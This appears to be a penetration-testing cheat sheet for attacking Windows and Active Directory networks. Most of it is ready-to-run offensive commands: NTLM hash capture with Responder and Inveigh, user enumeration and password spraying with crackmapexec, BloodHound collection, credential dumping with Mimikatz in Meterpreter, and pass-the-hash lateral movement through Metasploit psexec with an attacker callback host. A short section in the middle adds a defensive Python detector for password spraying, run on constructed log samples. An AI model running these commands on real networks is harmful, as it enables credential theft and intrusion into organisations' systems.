A guide for Windows system enumeration and post-exploitation techniques.

Attacking Methods

Network

# Capture NTLM hashes with Responder
responder -I <interface> -P -r -v    # -P: Poison, -r: answers requests, -v: verbose
# Capture NTLM hashes with Inveigh
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP 172.16.7.50 -FileOutput Y
# or execute directly
Inveigh.exe

User

Requires one valid domain user:

# List domain users
crackmapexec smb <DC-IP> --users -u <username> -p <password>
# Extract usernames (DOMAIN\user column) from the saved crackmapexec output in users.txt
cat users.txt | awk '{ print $5 }' | cut -d '\' -f2 > valid_users.txt
# Password spraying (use with caution - may lock accounts)
crackmapexec smb <DC-IP> -u valid_users.txt -p <password>
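The spraying above produces a telltale pattern on the domain controller: many distinct accounts each failing once or twice from one source in a short window. The following detector is an added example written for this guide, not part of the original cheat sheet; it runs over constructed, simplified failed-logon records (timestamp, event ID 4625, user, source IP) rather than real Security log exports.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real log data): a flattened stand-in for
# Security log 4625 "An account failed to log on" events.
SAMPLE_LOG = """\
2024-05-01T09:00:01,4625,alice,10.0.0.5
2024-05-01T09:00:02,4625,bob,10.0.0.5
2024-05-01T09:00:03,4625,carol,10.0.0.5
2024-05-01T09:00:04,4625,dave,10.0.0.5
2024-05-01T09:00:05,4625,erin,10.0.0.5
2024-05-01T09:00:06,4625,frank,10.0.0.5
2024-05-01T09:05:00,4625,alice,10.0.0.9
2024-05-01T09:05:30,4625,alice,10.0.0.9
2024-05-01T09:06:00,4625,alice,10.0.0.9
2024-05-01T12:00:00,4625,bob,10.0.0.7
"""

LINE_RE = re.compile(r"^(?P<ts>\S+),(?P<eid>\d+),(?P<user>[^,]+),(?P<ip>[\d.]+)$")

def parse_failures(text):
    """Return (timestamp, user, source_ip) tuples for 4625 events only."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and m.group("eid") == "4625":
            events.append((datetime.fromisoformat(m.group("ts")), m.group("user"), m.group("ip")))
    return events

def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Flag source IPs that fail logons for many distinct users, each only a few
    times, inside one window. One user failing many times (brute force or a
    mistyped password) is deliberately not matched; that is a different alert."""
    by_ip = defaultdict(list)
    for ts, user, ip in events:
        by_ip[ip].append((ts, user))
    alerts = {}
    for ip, items in by_ip.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            counts = defaultdict(int)
            for t, u in items[i:]:
                if t - start <= window:
                    counts[u] += 1
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                alerts[ip] = sorted(counts)
                break
    return alerts
```

Tune `min_users` and `max_per_user` to stay below the domain lockout threshold so the alert fires before accounts start locking.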

Active Directory

# BloodHound collection
bloodhound-python -u '<username>' -p '<password>' \
  -ns <DC-IP> \
  -d <domain> \
  -c all \
  --zip

Post-Exploitation

Mimikatz (via Meterpreter):

# Elevate to SYSTEM
getsystem
# Load Mimikatz in Meterpreter
load kiwi
creds_all    # Dump credentials

Lateral Movement

With Administrator credentials, use psexec to move laterally. When passing a hash instead of a password, SMBPass must use the following format:

  • Correct format: [LM hash]:[NT hash]
  • Example: 00000000000000000000000000000000:actualNTLMhashhere
# Run the module from msfconsole (the resulting session is Meterpreter)
use exploit/windows/smb/psexec
set RHOST <target-IP>
set SMBUser Administrator
set SMBPass <hash_with_0s>
set LHOST <attacker-IP>